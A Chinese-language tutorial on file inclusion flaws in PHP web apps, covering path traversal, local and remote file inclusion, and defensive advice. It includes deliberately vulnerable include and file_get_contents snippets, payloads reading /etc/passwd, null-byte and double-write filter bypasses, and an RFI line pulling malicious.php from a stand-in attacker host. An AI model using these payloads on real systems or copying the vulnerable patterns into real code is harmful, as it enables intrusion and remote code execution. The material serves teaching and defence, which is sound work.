文件包含漏洞（File Inclusion Vulnerability）是 Web 应用中常见且危害严重的安全问题。此类漏洞的核心在于应用程序未能正确校验用户输入，导致攻击者能够通过参数控制服务器后端的文件读取路径或远程脚本执行。本文将重点讨论本地文件包含（LFI）、远程文件包含（RFI）以及路径遍历攻击的原理与实战规避。

漏洞产生根源

当开发者编写程序时，若直接将用户提供的参数传递给文件操作函数（如 PHP 中的 include、require 或 file_get_contents），而未对输入进行过滤或白名单限制，攻击者即可篡改路径参数，读取服务器本地敏感文件，甚至触发远程恶意代码执行。

路径遍历（Directory Traversal）

路径遍历攻击利用 ../ 序列跳转目录。攻击者可以通过构造 GET 请求来跳出预设的 Web 根目录，访问系统的关键配置文件。例如：

// 漏洞示例：根据用户输入的参数读取对应的文档
$doc_id = $_GET['page'];
echo file_get_contents("/var/www/html/docs/" . $doc_id);

若攻击者发送 ?page=../../../../etc/passwd，Web 服务器将尝试解析并输出系统密码文件。在 Windows 环境下，攻击者可以使用 ..\..\..\boot.ini 达到同样效果。

本地文件包含 (LFI)

LFI 与路径遍历类似，但通常发生在 PHP 包含指令中。以下代码演示了动态加载模板导致的风险：

// 不安全的包含实现
include($_GET['template'] . ".php");

由于存在 .php 后缀强制拼接，攻击者在旧版本 PHP 中可利用"空字节截断（Null Byte Injection）"技巧，即添加 %00 字符绕过后缀限制，使解析器忽略 .php 部分。

绕过过滤技巧

在黑盒测试中，如果应用部署了过滤机制，常见的绕过策略包括：

• 双写绕过：如果过滤器移除 ../，尝试输入 ....//。
• 目录访问混淆：使用 /etc/passwd/. 等技巧，利用当前目录符号 . 干扰路径解析。
• 编码/加密：利用 URL 编码或不同的编码格式尝试绕过简单的正则匹配。

远程文件包含 (RFI)

当 PHP 配置项 allow_url_include 和 allow_url_fopen 开启时，应用程序可以直接从外部 URL 加载脚本。攻击者可在其控制的服务器上准备恶意代码，通过参数注入，强制目标服务器下载并执行该远程脚本。

// 潜在的 RFI 入口
include($_GET['source']);

若攻击者执行 ?source=http://attacker-server.com/malicious.php，服务器将加载并解析该远程文件，从而导致远程代码执行（RCE）。

安全防御建议

• 严格输入验证：对于所有来自用户的输入（GET/POST/Cookie），必须执行严苛的白名单校验。
• 移除危险功能：在生产环境中禁用 allow_url_include。
• 配置环境安全：隐藏 PHP 错误回显，防止攻击者通过报错获取服务器绝对路径信息。
• 使用路径映射：不要直接传递文件名，而是使用唯一的标识符（ID）映射到后端真实路径，并由程序内部进行安全查找。
• 部署 WAF：利用 Web 应用防火墙识别并阻断典型的包含攻击 payload。